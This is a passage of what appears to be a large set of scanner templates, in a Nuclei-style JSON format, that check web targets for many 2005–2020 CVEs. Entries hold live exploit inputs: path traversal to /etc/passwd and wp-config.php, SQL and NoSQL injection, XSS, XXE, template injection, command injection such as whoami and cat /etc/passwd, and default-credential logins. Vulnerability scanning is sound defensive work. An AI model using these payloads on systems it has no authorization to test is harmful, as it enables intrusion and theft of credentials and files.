Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-29284","info":{"name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6"]},{"type":"word","part":"body","words":["Restaurent Tables","Chair List"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: 